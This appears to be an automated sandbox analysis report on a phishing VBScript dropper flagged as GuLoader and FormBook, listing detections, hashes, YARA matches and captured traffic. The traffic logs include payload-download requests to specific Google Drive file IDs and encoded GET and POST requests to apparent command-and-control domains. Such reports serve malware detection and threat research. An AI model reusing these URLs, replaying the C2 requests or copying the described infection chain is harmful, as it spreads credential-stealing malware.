Windows Analysis Report
PO 26519PZ F30 59.vbs

Overview

General Information

Sample name: PO 26519PZ F30 59.vbs
Analysis ID: 1430127
MD5: 1e505992c6f53c34813238451ce858dd
SHA1: 1c4af804deb08c146c619964e4ec40ac8454945f
SHA256: 9e48a5d7e886597d49f7a161a55a101b5735ab7fd829dc62d7b854e0a0fb071b
Tags: GuLoadervbs
Infos:

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Multi AV Scanner detection for submitted file
Source: PO 26519PZ F30 59.vbs ReversingLabs: Detection: 18%
Yara detected FormBook
Source: Yara match File source: 0000000D.00000002.3363239692.0000000000A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3363165345.0000000000A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3362865159.0000000000F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3362030943.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2770587848.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2786483516.0000000020E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3363499558.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: unknown HTTPS traffic detected: 142.250.81.238:443 -> 192.168.2.6:49700 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.65.225:443 -> 192.168.2.6:49701 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.81.238:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.65.225:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2595475474.0000000007079000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: wab.exe, 0000000B.00000003.2681714587.000000001FF3E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.2786126386.00000000200F0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: ore.pdb0 source: powershell.exe, 00000005.00000002.2595475474.000000000714B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: wab.exe, wab.exe, 0000000B.00000003.2681714587.000000001FF3E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.2786126386.00000000200F0000.00000040.00001000.00020000.00000000.sdmp, icacls.exe
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2599815914.0000000007F00000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Core.pdbn source: powershell.exe, 00000005.00000002.2595475474.000000000714B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb/y source: powershell.exe, 00000005.00000002.2599815914.0000000007F00000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000005.00000002.2584189007.0000000002BC7000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_003AB130 FindFirstFileW,FindNextFileW,FindClose, 13_2_003AB130

Software Vulnerabilities
barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\icacls.exe Code function: 4x nop then xor eax, eax 13_2_003990E0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 4x nop then pop edi 13_2_0039D4A0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 4x nop then pop edi 13_2_003A16E4
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 91.195.240.117 91.195.240.117
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1ysXSWck_shfsiVSvx1UkpRU2R4FJ7k8Z HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?id=1ysXSWck_shfsiVSvx1UkpRU2R4FJ7k8Z&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1ZtB6Y93LGEJ7_RwEY2omVZFUmspULlYQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1ZtB6Y93LGEJ7_RwEY2omVZFUmspULlYQ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bnz5/?0TFT4=uPhDJ26p&OLTx7p=4BEdEKurUNEFwkFRegiDBzC7pj7sTtT0kB0gdoDHo+aBzggPclQDQJqF4ehpSB3lBDvuZzIzoYk2h0Zy/GWQVTCjZfM+P/Gg1ZlgpbDGRDiHo+BBw02A4+u5sqR3NAzj+twq1/A= HTTP/1.1Host: www.elysiangame.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic HTTP traffic detected: GET /bnz5/?OLTx7p=Z7N7hXY/vxItmyrXNQB4LENYEQnuSZ4/X1tSw0B7uFqoJtXe6IwXeXQiXEM/Xr4/ado0xvKOz5lKhVT9TZmVF0n4DqYSIgGlD+rIwihPR/pSypoeDE6i9dqJvHBXbQcbaAkLZ9U=&0TFT4=uPhDJ26p HTTP/1.1Host: www.blueberry-breeze.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: unknown DNS traffic detected: queries for: drive.google.com
Source: unknown HTTP traffic detected: POST /bnz5/ HTTP/1.1Host: www.blueberry-breeze.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cache-Control: max-age=0Connection: closeContent-Length: 211Content-Type: application/x-www-form-urlencodedOrigin: http://www.blueberry-breeze.comReferer: http://www.blueberry-breeze.com/bnz5/User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Data Raw: 4f 4c 54 78 37 70 3d 55 35 6c 62 69 67 4d 2f 6c 7a 59 54 71 47 57 71 4b 52 39 63 50 68 6c 78 45 6c 32 55 63 35 41 6d 62 46 70 65 36 33 34 32 6a 31 47 6e 4d 4e 66 75 78 76 77 4a 57 6b 46 2b 49 6b 6b 6a 66 76 67 39 52 74 41 67 6b 71 4f 57 6e 59 35 72 68 55 54 2f 63 63 76 78 50 45 62 31 57 2f 55 68 55 31 71 44 48 38 2b 48 37 6d 4d 64 65 38 5a 4c 32 36 41 51 59 30 76 74 68 50 71 34 6a 45 64 31 44 78 63 41 57 48 34 34 55 72 6b 79 31 52 6b 70 44 66 4c 63 33 31 31 74 6e 65 52 4e 6c 72 30 7a 63 6c 5a 65 59 4a 4d 50 69 4b 35 44 6a 50 47 57 74 67 6a 2b 55 41 5a 64 48 52 79 41 6e 37 47 4b 62 31 4a 63 2f 54 4e 47 67 57 2f 6b 58 6e 77 31 Data Ascii: OLTx7p=U5lbigM/lzYTqGWqKR9cPhlxEl2Uc5AmbFpe6342j1GnMNfuxvwJWkF+Ikkjfvg9RtAgkqOWnY5rhUT/ccvxPEb1W/UhU1qDH8+H7mMde8ZL26AQY0vthPq4jEd1DxcAWH44Urky1RkpDfLc311tneRNlr0zclZeYJMPiK5DjPGWtgj+UAZdHRyAn7GKb1Jc/TNGgW/kXnw1
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Tue, 23 Apr 2024 06:03:56 GMTserver: LiteSpeedvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 23 Apr 2024 06:04:35 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: *Access-Control-Allow-Headers: Content-Type,Access-Token,Appid,Secret,Authorization,TokenContent-Encoding: gzipData Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 140
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 23 Apr 2024 06:04:38 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: *Access-Control-Allow-Headers: Content-Type,Access-Token,Appid,Secret,Authorization,TokenContent-Encoding: gzipData Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 140
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 23 Apr 2024 06:04:43 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: *Access-Control-Allow-Headers: Content-Type,Access-Token,Appid,Secret,Authorization,TokenContent-Encoding: gzipData Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 140
Source: wscript.exe, 00000000.00000003.2096056521.0000020D14890000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2097104839.0000020D148F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: wscript.exe, 00000000.00000003.2085623443.0000020D16700000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2084178129.0000020D16700000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2096056521.0000020D14890000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085148892.0000020D16700000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2097104839.0000020D148F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2097824622.0000020D16990000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000003.2085047456.0000020D169C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085846697.0000020D169E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?87df90f520ad2
Source: wscript.exe, 00000000.00000003.2085047456.0000020D169C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085846697.0000020D169E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?87df90f520
Source: powershell.exe, 00000002.00000002.2642083150.0000015681DB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000002.00000002.2642083150.0000015681DEC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 00000002.00000002.2709902493.000001569006C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2590325281.0000000005534000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.2585121472.0000000004627000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2642083150.0000015680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2585121472.00000000044D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.2585121472.0000000004627000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2642083150.0000015680001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.2585121472.00000000044D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000002.00000002.2642083150.0000015681DD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000005.00000002.2590325281.0000000005534000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.2590325281.0000000005534000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.2590325281.0000000005534000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.2642083150.0000015681DAD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.googP
Source: powershell.exe, 00000002.00000002.2642083150.0000015681CF4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2642083150.0000015680227000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com
Source: wab.exe, 0000000B.00000002.2772002639.0000000004367000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: wab.exe, 0000000B.00000002.2772002639.0000000004367000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/;
Source: wab.exe, 0000000B.00000002.2772002639.00000000043A2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.2772002639.0000000004367000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1ZtB6Y93LGEJ7_RwEY2omVZFUmspULlYQ
Source: wab.exe, 0000000B.00000002.2772002639.00000000043A2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1ZtB6Y93LGEJ7_RwEY2omVZFUmspULlYQ.
Source: powershell.exe, 00000002.00000002.2642083150.0000015680227000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1ysXSWck_shfsiVSvx1UkpRU2R4FJ7k8ZP
Source: powershell.exe, 00000005.00000002.2585121472.0000000004627000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1ysXSWck_shfsiVSvx1UkpRU2R4FJ7k8ZXR
Source: powershell.exe, 00000002.00000002.2642083150.0000015681DD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.googh
Source: powershell.exe, 00000002.00000002.2642083150.000001568048E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2642083150.0000015681DD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com
Source: wab.exe, 0000000B.00000003.2679849857.00000000043D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/
Source: wab.exe, 0000000B.00000003.2679849857.00000000043D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/W
Source: wab.exe, 0000000B.00000003.2679787209.00000000043BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1ZtB6Y93LGEJ7_RwEY2omVZFUmspULlYQ&export=download
Source: powershell.exe, 00000002.00000002.2642083150.000001568048E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2642083150.0000015681DD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1ysXSWck_shfsiVSvx1UkpRU2R4FJ7k8Z&export=download
Source: powershell.exe, 00000005.00000002.2585121472.0000000004627000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2642083150.000001568145A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.2709902493.000001569006C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2590325281.0000000005534000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.2642083150.0000015681DD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000002.00000002.2642083150.0000015681DD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2642083150.000001568048A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2642083150.0000015681DD5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000002.00000002.2642083150.0000015681DD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000002.00000002.2642083150.0000015681DD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000002.00000002.2642083150.0000015681DD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2642083150.000001568048A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2642083150.0000015681DD5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown HTTPS traffic detected: 142.250.81.238:443 -> 192.168.2.6:49700 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.65.225:443 -> 192.168.2.6:49701 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.81.238:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.65.225:443 -> 192.168.2.6:49711 version: TLS 1.2

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 0000000D.00000002.3363239692.0000000000A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3363165345.0000000000A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3362865159.0000000000F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3362030943.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2770587848.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2786483516.0000000020E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3363499558.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: amsi32_4328.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: 0000000D.00000002.3363239692.0000000000A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.3363165345.0000000000A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000E.00000002.3362865159.0000000000F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.3362030943.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.2770587848.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.2786483516.0000000020E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.3363499558.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: powershell.exe PID: 1424, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 4328, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Very long command line found
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 6539
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 6539
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 6539 Jump to behavior
